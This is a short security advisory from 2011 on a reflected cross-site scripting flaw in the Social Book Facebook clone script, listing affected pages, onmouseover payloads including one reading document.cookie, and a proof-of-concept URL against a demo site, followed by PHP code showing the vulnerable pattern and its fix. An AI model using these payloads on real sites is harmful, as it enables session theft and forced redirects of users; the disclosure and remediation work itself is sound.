# Exploit Title: Social Book Facebook Clone Script Reflected XSS Vulnerability
# Date: 2011
# Author: Eyup CELIK
# Version: All versions
# Tested on: All versions are vulnerable
# Web Site: www.eyupcelik.com.tr


ISSUE

Reflected XSS via the request URL: input appended to the script path (index.php/...) is echoed back into the page without output encoding, so a double quote closes the surrounding HTML attribute and an injected event handler (onmouseover) is rendered, as the examples below show.

Vulnerable Pages:
signup.php
lostpass.php
login.php
index.php
help_tos.php
help_contact.php
help.php

Example (payload template):
index.php/"onmouseover=prompt(XSS CODE and DOM CODE)>



Exploit:
Reflected XSS: index.php/"onmouseover=prompt(document.cookie)>
DOM Based XSS:  
index.php/"onmouseover=prompt('window.location(http://google.com)')>


POC:
http://www.clonescriptsoftwaredemos.com/facebook/index.php/%22onmouseover=prompt('window.location(http://google.com)')%3E
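The pattern behind this class of bug, and the fix, as an added illustration that is not the Social Book source (which the advisory does not show): it assumes the script builds a form action or link from $_SERVER['PHP_SELF'], which carries any PATH_INFO appended to the URL, and writes it into a quoted attribute unencoded.

```php
<?php
// Added illustration; function names are hypothetical, not from the product.
// Assumption: the script echoes $_SERVER['PHP_SELF'] (script path plus any
// PATH_INFO such as /index.php/"onmouseover=...) into a quoted attribute.

// Vulnerable: a double quote in PATH_INFO closes the action attribute and
// whatever follows becomes new attribute text (an event handler).
function form_action_vulnerable(string $phpSelf): string
{
    return '<form action="' . $phpSelf . '" method="post">';
}

// Hardened: encode for the attribute context. ENT_QUOTES turns '"' into
// &quot; so the attribute cannot be terminated early; '<' and '>' are
// encoded too, so no new tag can be opened.
function form_action_safe(string $phpSelf): string
{
    $safe = htmlspecialchars($phpSelf, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<form action="' . $safe . '" method="post">';
}

// Stronger still: do not reflect the request path at all. SCRIPT_NAME
// excludes PATH_INFO, and a fixed action string removes the sink entirely.
function form_action_fixed(): string
{
    $self = htmlspecialchars($_SERVER['SCRIPT_NAME'] ?? '/index.php',
                             ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<form action="' . $self . '" method="post">';
}

// Constructed input mirroring the advisory's payload shape.
$phpSelf = '/facebook/index.php/"onmouseover=prompt(document.cookie)>';

echo "vulnerable: ", form_action_vulnerable($phpSelf), "\n";
echo "encoded:    ", form_action_safe($phpSelf), "\n";
echo "fixed:      ", form_action_fixed(), "\n";
```

Run with `php -f` and compare the three lines: only the first contains a bare `"` followed by `onmouseover`, which is the condition a response-body check for this bug would look for.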


Thanks,

Eyup CELIK
Information Technology Security Specialist
http://www.eyupcelik.com.tr